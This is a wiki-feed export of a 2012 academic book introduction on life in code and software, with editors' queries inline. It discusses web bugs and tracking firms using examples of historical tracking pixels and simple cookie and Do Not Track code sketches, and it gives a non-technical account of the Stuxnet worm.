[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al n.d.). There is also a suspicion that there may have been three versions of the Stuxnet code, revised in response to its discovery: “Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former” (Gross 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: ‘It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.’ &lt;br /&gt;
&lt;br /&gt;
[10] After having performed a detailed analysis of the Duqu code, Kaspersky Labs stated that they “are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language” (Evans 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: “It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)” (Wolfram 2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: “Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on” (Sense 2012). &lt;br /&gt;
&lt;br /&gt;
[15] ‘Computational actants’ draws the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software should be committed to the ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4671</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4671"/>
		<updated>2012-03-19T10:46:50Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/ Back to the book] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how we live today in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment and so on?] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet (Kitchin, 2011: 945).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al.'' have argued: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990, 39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world (Deuze, Blank, and Speers, 2012).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task made all the more difficult both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry, and by the increasing complexity, power, range and intelligence of the software that runs on them. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads, as much as haptic touch interfaces like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence (Madrigal, 2012).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages we browse. Often held within a tiny one-pixel frame or image, far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behaviour, and they also send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
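&lt;br /&gt;
To make the mechanism concrete, the following minimal Python sketch shows the round trip described above: the server sets a cookie on a first response and reads it back on subsequent requests. The cookie name and the use of Python's standard http.cookies module are my own illustrative choices, a sketch of the general mechanism rather than a reconstruction of any particular tracker: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of the HTTP cookie round trip (illustrative only).
from http.cookies import SimpleCookie
import uuid

def server_response(request_headers):
    # Read back any cookie the browser sent with this request.
    jar = SimpleCookie(request_headers.get('Cookie', ''))
    if 'visitor_id' in jar:
        return 'Known visitor: ' + jar['visitor_id'].value, None
    # First visit: set a persistent identifier (each cookie holds at most 4 KB).
    jar['visitor_id'] = uuid.uuid4().hex
    jar['visitor_id']['max-age'] = str(60 * 60 * 24 * 365)   # one year
    return 'New visitor', jar.output(header='Set-Cookie:')

body, set_cookie = server_response({})   # first visit: the cookie is set
print(body, '|', set_cookie)
# On every later request the browser returns the cookie automatically,
# which is what lets a server recognise the same user again.
body, _ = server_response({'Cookie': set_cookie.split(': ', 1)[1]})
print(body)
&amp;lt;/pre&amp;gt; &lt;br /&gt;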
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the ChartBeat company (http://chartbeat.com/), it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs (Ghostery 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user, code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of code and which is used here essentially to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on this web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal 2012). [Eds: please check that the single and double quotation marks here are correct] &lt;br /&gt;
&lt;br /&gt;
These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery 2011). As can be seen from the relative frequency of encounter, Google is clearly the biggest player by a long distance in the area of the collection of user statistics. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor generates $189 of revenue at [Amazon](http://www.businessinsider.com/blackboard/amazon) (e-commerce) and $24 at [Google](http://www.businessinsider.com/blackboard/google) (search), and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is increasingly extremely profitable. Ghostery (2010) has performed a useful analysis of its web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [AT&amp;amp;amp;T](http://www.att.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [Right Media](http://www.rightmedia.com/)&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [Burst Media](http://www.burstmedia.com/ ) &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [The New York Times](http://www.nytimes.com/)&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [BlueKai](http://www.bluekai.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [Experian](http://www.experian.com/) &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [ROILabs](http://www.roilabs.com/) &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are served through this data. Example: [Safecount](http://www.safecount.net/) &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [Google Analytics](http://www.google.com/analytics/) &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [FetchBack](http://www.fetchback.com/)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [Invite Media](http://www.invitemedia.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [AdMeld](http://www.admeld.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [DoubleClick DART](http://www.doubleclick.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [MediaCom](http://www.mediacom.com/en/home.aspx)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [ClickForensics](http://www.clickforensics.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [Better Advertising](http://www.betteradvertising.com/)&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
[[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma 2010)]] ''Image 1: Display Advertising Technology Landscape (Luma 2010)'' &lt;br /&gt;
&lt;br /&gt;
Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [Turn Media](http://www.turn.com/) is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [BlueKai](http://www.bluekai.com/), [TargusInfo](http://www.targusinfo.com/), [eXelate](http://www.exelate.com/new/index.html), and others (Ghostery 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [readnotify.com](http://readnotify.com/) to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers 2006, Fried 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the “do not track” header, and there is currently no legal requirement that they do so in the US, or elsewhere (W3C 2012). See, though, the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker 2012). &lt;br /&gt;
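&lt;br /&gt;
For illustration, the header in question is simply an extra line in the HTTP request. A minimal Python sketch, using only the standard urllib module (the target URL is a placeholder, and honouring the preference remains, as noted above, entirely voluntary on the server's side): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sending the 'do not track' preference as an HTTP header (DNT: 1).
import urllib.request

request = urllib.request.Request(
    'http://www.example.com/',      # placeholder URL
    headers={'DNT': '1'},           # 1 = the user opts out of tracking
)
with urllib.request.urlopen(request) as response:
    print(response.status)          # the server may or may not honour DNT
&amp;lt;/pre&amp;gt; &lt;br /&gt;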
&lt;br /&gt;
One of the newer web bugs under development, and perhaps indicative of the direction of travel, is PersianStat (http://www.persianstat.com/), an Iranian web tracking and data analytics service which claims to keep “an eye on 1091622 websites”, and which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies; Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them (Garber 2012, Pew 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This contradiction, between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found a host that met its ‘strike conditions’, that is, the location it was designed to attack, whereupon it activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet’, is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki 2011, mmpc2 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first “weaponized” computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller (60minutes 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system, which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behaviour and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBSNews 2010). Later, a ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (AP 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zetter (2011) explains: &lt;br /&gt;
